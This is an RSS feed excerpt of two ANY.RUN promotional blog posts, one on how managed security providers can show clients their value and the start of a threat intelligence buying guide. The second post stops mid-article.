<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="644" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-1024x644.png" alt="ANY.RUN’s sandbox helps analysts to see the full attack chain in seconds" class="wp-image-23194" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-1024x644.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-300x189.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-768x483.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-1536x966.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-2048x1289.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-370x233.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-270x170.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Sandbox-for-MSSP-740x466.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s sandbox helps analysts to see the full attack chain in seconds</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktosandbox" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps analysts collect that evidence during analysis, including process activity, network connections, files, URLs, and other indicators. </p>



<p class="wp-block-paragraph">The result is more than a verdict. MSSPs have concrete findings they can use to explain what was investigated, what was found, and what action was taken. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Make Invisible SOC Work Visible.
</span> 
<br>
Give clients clearer proof of what your team delivers.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=how-mssps-prove-value&#038;utm_term=170926&#038;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Build Stronger Client Trust</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading"><strong>Give Clients the Findings, Not the Technical Noise</strong> </h2>



<p class="wp-block-paragraph">Clients do not need every process, network request, or command line an analyst reviewed. They need a clear explanation of <strong>what was investigated, what the SOC concluded, and what action was taken.</strong> </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/cybersecurity-blog/soc-ready-reporting/" target="_blank" rel="noreferrer noopener">Tier 1 reports</a> help turn investigation results into structured summaries that MSSPs can use in client updates, monthly reports, and service reviews. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="594" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-1024x594.png" alt="Tier 1 reports with AI summary and recommendations " class="wp-image-23142" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-1024x594.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-300x174.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-768x446.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-1536x892.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-2048x1189.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-370x215.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-270x157.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Ti-report-for-MSSPs-740x430.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Tier 1 reports with AI summary and recommendations</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">For example, a report can show that the SOC analyzed a suspicious attachment, reviewed its behavior, identified relevant indicators, closed the case, and recommended follow-up actions where needed. </p>



<p class="wp-block-paragraph">That gives the client something concrete to see even when the month ended without a major incident. </p>



<p class="wp-block-paragraph">A closed investigation is no longer just an internal ticket. It becomes evidence of the work the MSSP performed and the decisions the SOC made on the client’s behalf. </p>



<h2 class="wp-block-heading">Show Clients the Threats They Are Facing </h2>



<p class="wp-block-paragraph">Individual investigations show what happened case by case. The bigger picture can be even more useful. </p>



<p class="wp-block-paragraph">MSSPs can use recurring patterns to show clients what is changing around them: which threat families are appearing more often, which campaigns are active, what infrastructure keeps resurfacing, and which techniques are becoming more common. </p>



<p class="wp-block-paragraph">ANY.RUN’s 2026 MSSP data shows frequent analysis of families such as <strong>ClickFix, <a href="https://any.run/malware-trends/sneaky2fa/" target="_blank" rel="noreferrer noopener">Sneaky2FA</a>, <a href="https://any.run/cybersecurity-blog/eviltokens-ghost-code-analysis/" target="_blank" rel="noreferrer noopener">EvilTokens</a>, EtherHiding, and <a href="https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/" target="_blank" rel="noreferrer noopener">Kali365</a></strong>. </p>



<p class="wp-block-paragraph">That gives MSSPs a stronger story than simply saying, “We investigated 200 cases.” </p>



<p class="wp-block-paragraph">With <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktotilookup" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>, analysts can connect indicators from individual investigations with related infrastructure, previous activity, and broader threat patterns. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-1024x586.png" alt="ANY.RUN’s Threat Intelligence gives full context around the attack for deeper investigations " class="wp-image-23144" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-768x440.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-2048x1172.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-270x155.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-Lookup-for-MSSps-740x424.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s Threat Intelligence gives full context around the attack for deeper investigations</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">Over time, that context can help MSSPs show clients <strong>what the threat situation looks like in their industry, which activity is becoming more relevant, and where attention may be needed next.</strong> </p>



<p class="wp-block-paragraph">So instead of reporting only what was closed, the MSSP can also explain: </p>



<ul class="wp-block-list">
<li>which threats were most active during the period; </li>



<li>what patterns appeared repeatedly; </li>



<li>which new indicators or infrastructure were uncovered; </li>



<li>and how the current activity compares with what the SOC was seeing before. </li>
</ul>



<p class="wp-block-paragraph">That turns threat intelligence into something useful for client conversations: not just more data, but a clearer view of the threat environment around their business. </p>



<h2 class="wp-block-heading"><strong>Make Response Time and Escalation Part of the Value Story</strong> </h2>



<p class="wp-block-paragraph">Clients may not see every investigation, but they can understand how quickly their SOC gets to a decision and how efficiently their provider uses analyst time. </p>



<p class="wp-block-paragraph">That makes response time and escalation rate useful proof-of-value metrics. </p>



<p class="wp-block-paragraph">Email alone makes up <strong>30.3% of MSSP sandbox submissions in ANY.RUN’s 2026 data</strong>. That means a significant share of day-to-day investigation work starts with suspicious messages that Tier 1 needs to validate quickly. </p>



<p class="wp-block-paragraph">With ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktosandbox" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, analysts can open suspicious emails, inspect attachments and links, observe behavior, and collect the context they need to decide whether a case can be closed or requires deeper investigation. </p>



<p class="wp-block-paragraph">MSSPs using ANY.RUN report <strong>20% less time spent on Tier 1 investigations</strong> and <strong>30% fewer escalations from Tier 1 to Tier 2</strong>. </p>



<p class="wp-block-paragraph">For clients, those numbers show that their provider is not wasting analyst time and resources on unnecessary handoffs. More cases can be resolved at the first line of analysis, while senior analysts stay focused on the investigations that truly need deeper expertise. </p>



<p class="wp-block-paragraph">So instead of reporting only how many cases were closed, MSSPs can also show <strong>how quickly they were resolved, how many were handled at Tier 1, and how efficiently SOC resources were used.</strong> </p>



<p class="wp-block-paragraph"></p>



<h2 class="wp-block-heading"><strong>Show Clients What Changed Because of the Investigation</strong> </h2>



<p class="wp-block-paragraph">A useful investigation should end with more than a verdict. </p>



<p class="wp-block-paragraph">For the client, the real value is knowing <strong>what the SOC found and what should happen next</strong>. </p>



<p class="wp-block-paragraph">With ANY.RUN, analysts can use behavioral evidence from the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktosandbox" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, indicators uncovered during analysis, and additional context from <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktotilookup" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> to support concrete recommendations. </p>



<p class="wp-block-paragraph">That can mean blocking a domain or IP, updating a detection rule, investigating related infrastructure, checking other endpoints, or watching for the same technique in future activity. </p>



<p class="wp-block-paragraph">Tier 1 reports help bring those findings together in a structured format, so MSSPs can include not only the result of the investigation, but also the recommended next steps. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="692" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-1024x692.png" alt="AI recommendations displayed inside Tier 1 reports" class="wp-image-23182" style="width:686px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-1024x692.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-300x203.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-768x519.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-1536x1038.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-2048x1385.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-370x250.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-270x183.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/AI-recommendations-740x500.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI recommendations displayed inside Tier 1 reports</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">They can see <strong>what was investigated, what the SOC learned from it, and what action was recommended as a result.</strong> </p>



<p class="wp-block-paragraph">Over time, that helps the MSSP show how everyday investigations are contributing to stronger detection and better security decisions, even when no major incident occurred. </p>



<h2 class="wp-block-heading"><strong>Make the Value Visible Before Renewal Time</strong> </h2>



<p class="wp-block-paragraph">The worst time to explain an MSSP’s value is when a renewal is already on the table. </p>



<p class="wp-block-paragraph">If clients only hear about the SOC when something goes wrong, long periods without major incidents can make the service look quieter than it really is. </p>



<p class="wp-block-paragraph">Regular reporting changes that. </p>



<p class="wp-block-paragraph">When MSSPs consistently show what was investigated, how quickly cases were resolved, which threats were identified, what indicators were uncovered, and what actions were recommended, clients get a much clearer picture of the work happening throughout the year. </p>



<p class="wp-block-paragraph">That makes monthly reports and QBRs more than status updates. They become a record of the service delivered over time. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Join 2,170+ MSSPs worldwide.
</span> 
<br>
Investigate faster and give clients clearer proof of SOC’s work.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Strengthen Client Retention</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading"><strong>Make Proof of Value Part of the Service</strong> </h2>



<p class="wp-block-paragraph">For MSSPs, proving value should not depend on a major incident happening. </p>



<p class="wp-block-paragraph">The stronger model is to make investigation output part of the client experience throughout the year; in monthly reports, service reviews, and renewal conversations. </p>



<p class="wp-block-paragraph">ANY.RUN helps MSSPs bring together investigation evidence, threat context, response metrics, and recommended actions so clients can see not only that the service is running, but what it is delivering. </p>



<p class="wp-block-paragraph">That gives MSSPs a stronger story to tell when the month is quiet, and a clearer way to show why the service matters. </p>



<h2 class="wp-block-heading"><strong>About ANY.RUN</strong> </h2>



<p class="wp-block-paragraph">Trusted by <strong>700,000+ cybersecurity professionals, 16,000+ organizations, and 2,170+ MSSPs worldwide</strong>, including 64% of Fortune 500 companies, ANY.RUN helps security teams detect and investigate threats faster. </p>



<p class="wp-block-paragraph">Our <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktosandbox" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> provides real-time behavioral analysis of suspicious files and URLs, enabling confident triage and response. </p>



<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktotilookup" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> and <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=how-mssps-prove-value&amp;utm_term=170926&amp;utm_content=linktotifeeds" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> deliver live, verified threat data that strengthens detection and improves prioritization. </p>



<p class="wp-block-paragraph">By embedding analysis and intelligence into daily SOC workflows, ANY.RUN helps organizations reduce response time, lower operational costs, and minimize security risk. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/how-mssps-prove-value/">How MSSPs Can Prove Their Value When “Nothing Happened”</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/how-mssps-prove-value/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Enterprise Threat Intelligence Buying Guide: How to Choose the Right Solution</title>
		<link>https://any.run/cybersecurity-blog/enterprise-threat-intelligence-guide/</link>
					<comments>https://any.run/cybersecurity-blog/enterprise-threat-intelligence-guide/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 17 Sep 2026 07:44:11 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23136</guid>

					<description><![CDATA[<p>Choosing an enterprise threat intelligence solution is about more than just data volume or integrations. The right provider should deliver relevant intelligence, fit existing workflows, and help security teams investigate threats faster. While SOCs may prioritize rapid investigation and enrichment at scale, MSSPs may focus more on multi-tenancy and customer separation. This enterprise threat intelligence [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/enterprise-threat-intelligence-guide/">Enterprise Threat Intelligence Buying Guide: How to Choose the Right Solution</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Choosing an enterprise threat intelligence solution is about more than just data volume or integrations. The right provider should deliver relevant intelligence, fit existing workflows, and help security teams investigate threats faster. </p>



<p class="wp-block-paragraph">While <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">SOCs</a> may prioritize rapid investigation and enrichment at scale, <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a> may focus more on multi-tenancy and customer separation. </p>



<p class="wp-block-paragraph">This enterprise threat intelligence buying guide covers the key criteria to consider, including intelligence quality, integrations, data privacy, scalability, and proof-of-concept testing. </p>



<h2 class="wp-block-heading">Key Takeaways </h2>



<ul class="wp-block-list">
<li>Start by defining your <a href="https://intelligence.any.run/?utm_source=mtt&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktothreatintelligence" target="_blank" rel="noreferrer noopener">threat intelligence</a> requirements and the security workflows you need to support. </li>
</ul>



<ul class="wp-block-list">
<li>Focus on intelligence quality, freshness, context, and threat intelligence enrichment rather than data volume alone. </li>
</ul>



<ul class="wp-block-list">
<li>Check integrations, API capacity, and STIX/TAXII support before making a decision. </li>
</ul>



<ul class="wp-block-list">
<li>Consider privacy, scalability, and IOC management as part of the evaluation. </li>
</ul>



<ul class="wp-block-list">
<li>Use real alerts and investigations to test shortlisted offerings during a proof of concept. </li>
</ul>



<ul class="wp-block-list">
<li>Choose a provider based on how effectively its intelligence supports your team&#8217;s day-to-day security operations. </li>
</ul>



<h2 class="wp-block-heading">Start With Your Security Team’s Requirements </h2>



<p class="wp-block-paragraph">The first step in threat intelligence vendor selection is understanding what your security team needs intelligence to accomplish, rather than comparing feature lists. </p>



<p class="wp-block-paragraph">Some organizations may prioritize faster alert investigation and enrichment, while others need intelligence for <a href="https://any.run/cybersecurity-blog/threat-hunting-practical-usecases/" target="_blank" rel="noreferrer noopener">threat hunting</a>, malware analysis, or proactive monitoring. MSSPs may also require strong customer separation and efficient multi-tenant workflows. </p>



<p class="wp-block-paragraph">Start by identifying the teams, workflows, and data involved, then define your <a href="https://any.run/cybersecurity-blog/mitre-ciso-risk-reduction/" target="_blank" rel="noreferrer noopener">threat intelligence requirements</a> around factors such as intelligence freshness, investigation context, API capacity, integrations, privacy, automation, and access management. </p>



<p class="wp-block-paragraph">Clear requirements make it easier to focus on capabilities that directly support your security operation. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="559" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-1024x559.png" alt="" class="wp-image-23148" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-1024x559.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-300x164.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-768x419.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-1536x838.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-370x202.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-270x147.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6-740x404.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image6.png 1951w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Mirage2FA phishing kit detonated inside ANY.RUN’s Interactive Sandbox</em></figcaption></figure>



<p class="wp-block-paragraph">For teams that need both intelligence and hands-on analysis, it can also be useful to consider how threat intelligence connects with malware and phishing investigation. <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN&#8217;s Interactive Sandbox</a> provides an environment for analyzing threats in real time, with capabilities including interactive analysis, SOC-ready reporting, and integrations through API, SDK, and security standards. Its virtual machines start in under 10 seconds, with reports available in about 40 seconds. </p>



<h2 class="wp-block-heading">Look at Threat Intelligence Quality and Context </h2>



<p class="wp-block-paragraph">The size of an intelligence database doesn&#8217;t necessarily determine its value. During evaluation, consider the quality and sources of the data, how quickly it becomes available, how indicators are validated, and how much context accompanies each result. </p>



<p class="wp-block-paragraph">This is especially important for threat intelligence aggregation. Combining multiple sources can improve coverage, but may also introduce outdated, duplicate, or conflicting data. Without effective filtering and context, more data can simply create more noise. </p>



<p class="wp-block-paragraph">Analysts often need more than a malicious or benign verdict. Details such as related domains, URLs, files, malware families, infrastructure, and historical activity can help determine an indicator&#8217;s relevance. </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/triage-analyst-guide/" target="_blank" rel="noreferrer noopener">Threat intelligence enrichment</a> provides analysts with the context needed to assess threats and determine what to investigate next. </p>



<p class="wp-block-paragraph">For example, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Threat Intelligence Lookup</a> (TI Lookup) lets analysts search indicators and event fields and investigate relationships between domains, IPs, URLs, hashes, files, TTPs, and other data. It delivers each result in about 2 seconds and connects threat intelligence with data from sandbox research sessions, giving analysts additional context for investigations. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="627" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-1024x627.png" alt="" class="wp-image-23152" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-1024x627.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-300x184.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-768x470.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-1536x941.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-370x227.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-270x165.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10-740x453.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/image10.png 1726w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup delivers real-time threat intelligence</em></figcaption></figure>



<p class="wp-block-paragraph">TI Lookup draws on threat intelligence contributed through investigations from 16,000 organizations and more than 700,000 analysts, providing additional context for investigations. It delivers fresh, up-to-date intelligence on the latest malware and phishing attacks, helping security teams stay informed about emerging threats and attack trends. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Tap into threat intelligence from 16K+ organizations to stay ahead of emerging threats.
</span> 
<br>
Boost DR by 36% and cut MTTR by 21 mins per case.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=enterprise-threat-intelligence-guide&#038;utm_term=170926&#038;utm_content=linktotilookuplanding#contact-sales" rel="noopener" target="_blank">
Integrate ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">In addition, <a href="https://intelligence.any.run/reports?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_content=ti_reports&amp;utm_term=17092026" target="_blank" rel="noreferrer noopener">Threat Intelligence Reports</a> (TI Reports) can provide another layer of context by summarizing emerging threats, attack techniques, malware activity, and relevant indicators. When evaluating a provider, consider whether reports are timely, well-sourced, actionable, and easy for analysts to connect with ongoing investigations. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="531" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-1024x531.png" alt="" class="wp-image-23153" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-1024x531.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-300x156.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-768x399.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-1536x797.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-2048x1063.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-370x192.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-270x140.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss01-740x384.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>US threat landscape insights in ANY.RUN’s TI Reports</em></figcaption></figure>



<h2 class="wp-block-heading">Prioritize Fresh Intelligence </h2>



<p class="wp-block-paragraph">Threat intelligence can lose relevance over time, especially when used to identify active infrastructure or support automated detection. </p>



<p class="wp-block-paragraph">When evaluating a provider, consider how quickly new intelligence becomes available and how outdated indicators are identified, updated, or retired. Fresh data helps teams respond to current activity, while historical visibility allows analysts to investigate whether an indicator or related infrastructure has appeared before. </p>



<p class="wp-block-paragraph">The right balance depends on your use case. Real-time alert enrichment may require frequent updates, while threat hunting may place greater value on extensive historical context. </p>



<p class="wp-block-paragraph">Look for clear information on how intelligence is timestamped, validated, updated, and maintained, as these factors directly affect its value in investigations and detection workflows. </p>



<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=enterprise-threat-intelligence-guide&amp;utm_term=170926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Threat Intelligence Feeds</a> can support these requirements by providing live malicious IPs, domains, and URLs enriched with sandbox analysis. TI Feeds continuously update their data, with 99% of unique, high-confidence IOCs undergoing validation before being added. </p>



